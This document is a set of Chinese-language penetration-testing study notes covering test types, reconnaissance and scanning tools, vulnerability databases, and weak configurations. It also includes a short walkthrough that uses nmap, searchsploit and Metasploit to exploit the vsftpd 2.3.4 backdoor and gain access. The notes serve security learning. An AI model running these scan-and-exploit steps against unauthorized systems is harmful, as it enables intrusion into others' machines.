# 滲透測試 ## 針對企業合資安做結合 * 企業針對密碼進行測策略 * 身分驗鎮相關 * 弱點工具可以利用 * 資料庫問題 * SQL Injection ## SQL Injection又是甚麼東西? * 自己看:D ## 資安學習衍生 * 常見資料庫 * 資料庫架構 * 語法 * 前後端結合 * 後端運用 ## 資安學習衍生 * SQL Injection多個攻擊手法 * 如何修復 * CVSS * WAF(網路應用程式防火牆) ## 何謂滲透測試? [資安這條路 29 - [滲透測試] 滲透測試流程、資訊安全概論](https://ithelp.ithome.com.tw/articles/10253261) ## 測試類型區分 * 黑箱 * 只提供網址或目標名稱 * 白箱 * 提供各種資訊 * 灰箱 * 協助提供資訊 ## 收集階段 * Google Hacking(好用) * 服務弱掃 * Nessus * OpenVAS * 網頁弱掃 * IBM AppScan , OWASP ZAP * Acunetix Web Vlunerability Scanner ## 收集資訊 * 已知漏洞 * 版本太舊 * 軟體資源結束 * 設定不完善 * 安全設定不完善 * 使用不安全的通訊協定 * 使用未具有加密通訊功能協定(FTP、Telnet) * 使用強度較弱的密碼 * 字串過短(弱密碼=>mima) * 易於推測 ## 時差攻擊 * ZERO ATTACK * ONE ATTACK * N Day ATTACK ## 漏洞資料庫 * CVE * NVD - 類似CVE * TVN[TWCERT](台灣的) * VU * ICS * JVN ## 弱點利用 接續弱掃 * Metasploit * 使用方式 * ip addr看自己的網段 * nmap 自己的網域 * nmap -p 21 -sV 子網域 * nmap -p 21 -sC 子網域  * searchsploit vsftpd(服務) 2.3.4(服務版本)  * cat /usr/share/exploitdb/exploits/unix/... -> vsftpd(先看內容在執行 -> 防止被植入後門) * msfconsole進入頁面 * search vsftpd * use exploit/...上面找到的路徑 * options * ip addr * set RHOSTS 自己的IP * run 開始攻擊 -> 拿到權限 ## 小工具: [GHDB](https://www.exploit-db.com/google-hacking-database) [Wayback machine](https://archive.org/web/) [shodan](https://www.shodan.io/) [DNSdumpster](https://dnsdumpster.com/) [Day 6 被動搜查(3)-Google Hacking、shadon、.git 洩漏](https://ithelp.ithome.com.tw/articles/10269308) ## 弱點通報 * [twcert](https://www.twcert.org.tw/) dOWOb ~~~